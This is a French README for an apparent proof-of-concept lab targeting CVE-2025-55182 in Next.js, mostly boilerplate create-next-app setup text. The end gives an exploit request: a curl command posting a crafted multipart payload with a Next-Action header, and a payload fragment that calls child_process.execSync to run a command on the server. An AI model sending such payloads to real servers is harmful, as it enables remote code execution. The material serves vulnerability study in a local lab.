
Preuve de concept d'exploitation de CVE-2025-55182 ciblant une falsification de requête côté serveur (SSRF) sur Next.js via des requêtes multipart fabriquées avec manipulation de l'en-tête Next-Action.
Ceci est un projet Next.js initialisé avec create-next-app.
Tout d'abord, lancez le serveur de développement :
npm run dev
# or
yarn dev
# or
pnpm dev
# or
bun dev
Ouvrez http://localhost:3000 dans votre navigateur pour voir le résultat.
Vous pouvez commencer à modifier la page en éditant app/page.tsx. La page se met à jour automatiquement lorsque vous modifiez le fichier.
Ce projet utilise next/font pour optimiser et charger automatiquement Geist, une nouvelle famille de polices pour Vercel.
Pour en savoir plus sur Next.js, consultez les ressources suivantes :
Vous pouvez consulter le dépôt GitHub de Next.js - vos retours et contributions sont les bienvenus !
Le moyen le plus simple de déployer votre application Next.js est d'utiliser la plateforme Vercel créée par les développeurs de Next.js.
Consultez notre documentation de déploiement Next.js pour plus de détails.
npx create-next-app@latest react-vuln-lab
npm install [email protected] [email protected] [email protected] --legacy-peer-deps
curl -v http://localhost:3000/ \
-H "Content-Type: multipart/form-data; boundary=boundary" \
-H "Next-Action: <YOUR_ACTION_ID_HERE>" \
--data-binary @payload.txt
- "_prefix": "require('child_process').execSync('whoami').toString()"